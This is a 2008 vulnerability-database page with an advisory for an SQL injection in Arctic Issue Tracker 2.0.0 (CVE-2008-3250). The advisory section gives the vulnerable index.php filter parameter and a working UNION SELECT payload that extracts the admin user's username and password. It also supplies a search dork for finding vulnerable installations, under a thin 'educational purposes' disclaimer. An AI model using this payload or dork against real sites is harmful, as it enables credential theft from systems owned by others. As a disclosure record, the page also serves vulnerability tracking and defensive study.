|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability
|
SecurityAlert : 4017
CVE : CVE-2008-3250
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : IloveYouTryaG
Published : 23.07.2008
Affected Software : | Arctictracker, Arctic_issue_tracker, 2.0.0 |
 Advisory Content : IloveYouTryaG
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Remote SQL Injection
Author :: QTRinu x [ Qataro (at) hotmail (dot) Com ]
Application :: Arctic Issue Tracker v2.0.0
Download :: http://www.arctictracker.com
Price :: $99.95 USD
Dork 1 :: Powered by Arctic v2.0.0
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM &
Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use
it for illegal acts.
--------------------------------------------[C o n t e x
t]-----------------------------------------
Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]
SQL :
-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arcti
c_user%20where%20id=1--
-------------------------------------------[End of
context]----------------------------------------
thanx str0ke/*
References :
http://securityreason.com/expldownload/1/4353/1 (Exploit)
http://www.securityfocus.com/bid/30277
http://www.milw0rm.com/exploits/6097
http://secunia.com/advisories/31139
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|